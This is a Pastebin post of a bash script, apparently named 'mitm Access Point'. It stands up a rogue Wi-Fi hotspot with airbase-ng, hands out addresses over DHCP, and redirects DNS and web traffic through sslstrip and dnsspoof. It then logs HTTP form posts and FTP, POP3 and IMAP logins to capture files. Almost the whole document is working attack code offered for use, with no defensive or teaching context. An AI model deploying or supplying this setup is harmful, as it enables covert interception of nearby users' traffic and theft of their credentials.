Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/bin/bash
- ###########################################################################################################
- #---------------------------- Configuration Stuff --------------------------------------------------------#
- ###########################################################################################################
- ESSID=linksys # default value... can be changed at runtime with -e <ssid>
- MON=mon0
- CHAN=6
- INT=eth1
- GATEWAY=`/sbin/ip route | awk '/default/ { print $3 }' | head -1`
- # Strip SSL? Modify arguments or comment out to disable
- SSLSTRIP="python /pentest/web/sslstrip/sslstrip.py "
- SSTRIPARGS="-f -a -w /tmp/sslstrip"
- #---------------------------------
- IPSTART=10.0.0.16
- IPEND=10.0.0.55
- ROUTER=10.0.0.1
- SUBNET=10.0.0.0
- BROADCAST=10.0.0.0
- NETMASK=255.255.255.0
- DNS=10.0.0.1
- DHCP="authoritative;\n\
- ddns-update-style ad-hoc;\n\
- subnet $SUBNET netmask $NETMASK {\n\
- allow unknown-clients;\n\
- default-lease-time 600;\n\
- max-lease-time 7200;\n\
- option subnet-mask $NETMASK;\n\
- option broadcast-address $BROADCAST;\n\
- option routers $ROUTER;\n\
- option domain-name-servers $DNS;\n\
- range dynamic-bootp $IPSTART $IPEND;\n\
- }"
- # Password Logging
- HTTPLOG=/tmp/http.pcap
- FTPLOG=/tmp/ftp.pcap
- POP3LOG=/tmp/pop3.pcap
- IMAPLOG=/tmp/imap.pcap
- #--------------------------- END OF CONFIGURATION ----------------------------
- ##-- Handle Arguments
- if [ $1 = "-e" ]
- then
- ESSID=$2
- fi
- ###########################################################################################################
- #----------------------------- Splash Screen -------------------------------------------------------------#
- ###########################################################################################################
- echo -e "\033[31;4m \033[0m"
- echo -e "\033[31;4m*******************************************************************\033[0m"
- echo -e "\033[29;1m _ __ \033[0m"
- echo -e "\033[29;1m ____ ___ (_) /_____ ___ \033[0m"
- echo -e "\033[29;1m / __ \`__ \/ / __/ __ \`__ \ \033[0m"
- echo -e "\033[29;1m / / / / / / / /_/ / / / / /\033[0m"
- echo -e "\033[29;1m /_/ /_/ /_/_/\__/_/ /_/ /_/ \033[0m"
- echo -e "\033[29;1m ___ ______ _ _ \033[0m"
- echo -e "\033[29;1m / _ \ | ___ \ (_) | | \033[0m"
- echo -e "\033[29;1m / /_\ \ ___ ___ ___ ___ ___ | |_/ /__ _ _ __ | |_ \033[0m"
- echo -e "\033[29;1m | _ |/ __/ __/ _ \/ __/ __| | __/ _ \| | '_ \| __| \033[0m"
- echo -e "\033[29;1m | | | | (_| (_| __/\__ \__ \ | | | (_) | | | | | |_ \033[0m"
- echo -e "\033[29;1m \_| |_/\___\___\___||___/___/ \_| \___/|_|_| |_|\__| \033[0m"
- echo -e "\033[31;1m \033[0m"
- echo -e " \033[31;4mCurrent Configuration:\033[0m"
- echo -e "\033[31;1m ESSID: \033[34;1m$ESSID\033[31;1m Channel:\033[34;1m$CHAN\033[31;1m \033[0m"
- echo -e "\033[31;1m Bridged Interface: \033[34;1m$INT\033[31;1m \033[0m"
- echo -e "\033[31;1m Default Gateway: \033[34;1m$GATEWAY\033[31;1m \033[0m"
- echo -e "\033[31;1m DHCP Range: \033[34;1m$IPSTART\033[31;1m - \033[34;1m$IPEND\033[31;1m \033[0m"
- echo -e "\033[31;1m Soft-Router IP: \033[34;1m$ROUTER\033[31;1m \033[0m"
- echo -e "\033[31;1m Subnet: \033[34;1m$SUBNET\033[31;1m Broadcast: \033[34;1m$BROADCAST\033[31;1m \033[0m"
- echo -e "\033[31;1m Netmask: \033[34;1m$NETMASK DNS: \033[34;1m$DNS\033[31;1m \033[0m"
- if [ -n "${SSLSTRIP+x}" ]
- then
- echo -e "\033[31;1m Strip SSL: \033[34;1mYes\033[31;1m Args: \033[34;1m$SSTRIPARGS\033[31;1m \033[0m"
- else
- echo -e "\033[31;1m Strip SSL: \033[34;1mNo \033[0m"
- fi
- echo ""
- echo -e "\033[29;1m !!!!! Confirm wifi card is in monitor mode at $MON !!!!!! \033[0m"
- echo -e "\033[31;1m CTRL-C to Cancel \033[0m"
- echo -e "\033[32;1m Press Enter to continue... \033[0m"
- echo -e "\033[31;4m \033[0m"
- echo -e "\033[31;4m******************************************************************\033[0m"
- read
- ###########################################################################################################
- #------------------------------ Running Commands ---------------------------------------------------------#
- ###########################################################################################################
- echo -e "\033[32;1mStarting fake accesspoint with ESSID $ESSID\033[0m"
- #gnome-terminal -e "airbase-ng -c $CHAN -e $ESSID $MON"
- gnome-terminal -e "airbase-ng -w 01234ABCD0 -c $CHAN -e $ESSID $MON"
- sleep 5
- echo -e "\033[32;1mConfiguring Tap Interface at0\033[0m"
- ifconfig at0 up
- ifconfig at0 $ROUTER netmask $NETMASK
- ifconfig at0 mtu 1400
- echo -e "\033[32;1mSetting up forwarding and routing\033[0m"
- route add -net $SUBNET netmask $NETMASK gw $ROUTER
- echo 1 > /proc/sys/net/ipv4/ip_forward
- iptables -t nat -A POSTROUTING -o $INT -j MASQUERADE
- iptables -A FORWARD -i at0 -j ACCEPT
- iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 192.168.200.2
- echo -e "\033[32;1mStarting DHCP Server on at0\033[0m"
- mv /etc/dhcp3/dhcpd.conf /etc/dhcpd.conf.old
- echo -e $DHCP > /etc/dhcp3/dhcpd.conf
- killall dhcpd3 &> /dev/null
- gnome-terminal -e "dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0"
- if [ -n "${SSLSTRIP+x}" ]
- then
- echo -e "\033[32;1mStarting SSL Strip\033[0m"
- iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
- $SSLSTRIP$SSTRIPARGS &> /dev/null &
- echo -e "\033[32;1mStarting DNS Spoofing on at0\033[0m"
- /usr/local/sbin/dnsspoof -i at0 &> /dev/null &
- fi
- echo -e "\033[32;1mLogging packet captures containing credentials\033[0m"
- ngrep -O $HTTPLOG -d at0 -i '^(GET|POST)' tcp port 80 > /dev/null&
- ngrep -O $FTPLOG -d at0 -i '^(USER|PASS)' tcp port 21 > /dev/null&
- ngrep -O $IMAPLOG -d at0 -i '^(a login )' tcp port 143 > /dev/null&
- ngrep -O $POP3LOG -d at0 -i '^(USER|PASS)' tcp port 110 > /dev/null&
- ###########################################################################################################
- #---------------------------------------Cleanup Stuff-----------------------------------------------------#
- ###########################################################################################################
- echo -e "\033[31;1m*******************************************************************\033[0m"
- echo -e "\033[31;1m Press Enter to Gracefully Exit\033[0m"
- echo -e "\033[31;1m*******************************************************************\033[0m"
- read
- killall ngrep > /dev/null
- killall airbase-ng
- killall dhcpd3
- if [ -n "${SSLSTRIP+x}" ]
- then
- kill $(ps aux | grep -m 1 "python /pentest/web/sslstrip/sslstrip.py" | awk '{print $2}') #kill sslstrip
- killall dnsspoof #kill dnsspoof
- fi
- # Reset networking stuff
- iptables --flush
- iptables --table nat --flush
- iptables --delete-chain
- iptables --table nat --delete-chain
- echo 0 > /proc/sys/net/ipv4/ip_forward
Add Comment
Please, Sign In to add comment